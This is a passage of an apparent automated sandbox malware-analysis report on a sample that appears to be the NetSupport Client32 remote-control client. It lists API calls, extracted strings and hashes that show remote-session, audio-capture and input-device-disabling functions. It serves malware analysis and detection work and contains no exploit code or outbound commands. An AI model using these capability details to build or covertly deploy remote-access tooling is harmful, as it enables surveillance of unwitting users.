                                                                                                              • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                                              • GetDesktopWindow.USER32 ref: 1115B309
                                                                                                              • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 2935161463-0
                                                                                                              • Opcode ID: 904692d62195826fcfb4a436604818d54d62b693bb951996d617b667ce96a948
                                                                                                              • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                                              • Opcode Fuzzy Hash: 904692d62195826fcfb4a436604818d54d62b693bb951996d617b667ce96a948
                                                                                                              • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                                                • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_getlocalipaddressinuse), ref: 11063592
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                                              • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                                              • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                                              • API String ID: 1096595926-1306570422
                                                                                                              • Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                                              • Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
                                                                                                              • Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                                              • Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556
                                                                                                              APIs
                                                                                                                • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                                              • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                                                • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                                                • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                                              • wsprintfA.USER32 ref: 1100548D
                                                                                                              • DeleteObject.GDI32(?), ref: 110054E2
                                                                                                              • DeleteObject.GDI32(?), ref: 110054EB
                                                                                                              • SelectObject.GDI32(?,?), ref: 11005502
                                                                                                              • DeleteObject.GDI32(?), ref: 11005508
                                                                                                              • DeleteDC.GDI32(?), ref: 1100550E
                                                                                                              • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                                              • DeleteObject.GDI32(?), ref: 11005528
                                                                                                              • DeleteDC.GDI32(?), ref: 1100552E
                                                                                                              • DeleteObject.GDI32(?), ref: 1100553F
                                                                                                              • DeleteObject.GDI32(?), ref: 1100556A
                                                                                                              • DeleteObject.GDI32(?), ref: 11005588
                                                                                                              • DeleteObject.GDI32(?), ref: 11005591
                                                                                                              • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                                              • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                                              • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                              • API String ID: 2789700732-770455996
                                                                                                              • Opcode ID: d5666059194125e5e798e1ea1a571cdf665601eefd1acf21ad263d58b3d84359
                                                                                                              • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                                              • Opcode Fuzzy Hash: d5666059194125e5e798e1ea1a571cdf665601eefd1acf21ad263d58b3d84359
                                                                                                              • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                                              APIs
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                • Part of subcall function 110ED1F0: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105E76C,?,00000000,?,00000000,75BF8400,?,?,1105E76C,80000001), ref: 110ED21B
                                                                                                              • GetTickCount.KERNEL32 ref: 110FF4DB
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FF4E8
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 110FF4F5
                                                                                                              • GetTickCount.KERNEL32 ref: 110FF4FB
                                                                                                              • wsprintfA.USER32 ref: 110FF5BE
                                                                                                              • _memset.LIBCMT ref: 110FF5CF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
                                                                                                              • String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
                                                                                                              • API String ID: 137837830-2801557662
                                                                                                              • Opcode ID: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                                              • Instruction ID: a11abc6b97969388e485db2e6a8e88b8a5e3b39e7edf5af597a12920a36432c8
                                                                                                              • Opcode Fuzzy Hash: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                                              • Instruction Fuzzy Hash: 9471EC75E4421ABBEB10DBA1DC89FEEF774EB08708F10419DED14A6181EB306944CBA6
                                                                                                              APIs
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • wsprintfA.USER32 ref: 110EB1B8
                                                                                                              • GetTickCount.KERNEL32 ref: 110EB212
                                                                                                              • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                                              • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                                              • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                                              • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                                              • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                                              • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                                              • API String ID: 3451743168-2289091950
                                                                                                              • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                                              • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                                              • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                                              • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                                              APIs
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • _malloc.LIBCMT ref: 1100B366
                                                                                                                • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,E43C2CA5,?,00000000,00000000), ref: 1100AC84
                                                                                                                • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                                                • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                                                • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                                                • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                                                • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                                                • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                                                                                • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                                              • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,E43C2CA5,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                                              • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                                              • _calloc.LIBCMT ref: 1100B3E9
                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                                              • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                                              • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                                              Strings
                                                                                                              • DisableSounds, xrefs: 1100B342
                                                                                                              • Audio, xrefs: 1100B347
                                                                                                              • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                                              • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                                              • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                                              • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                                              • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                                              • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                                              • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                              • API String ID: 1843377891-2362500394
                                                                                                              • Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                                              • Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
                                                                                                              • Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                                              • Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1
                                                                                                              APIs
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                                              • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                                              • _fgets.LIBCMT ref: 1102B3C0
                                                                                                              • _strtok.LIBCMT ref: 1102B3E8
                                                                                                                • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                                              • _fgets.LIBCMT ref: 1102B424
                                                                                                              • _strtok.LIBCMT ref: 1102B438
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                                              • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                              • API String ID: 78526175-1484737611
                                                                                                              • Opcode ID: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                                              • Instruction ID: 83a04ffa2f5f23a923324f4189043cfd8b751997b231b4d3af7dc0cd534076c2
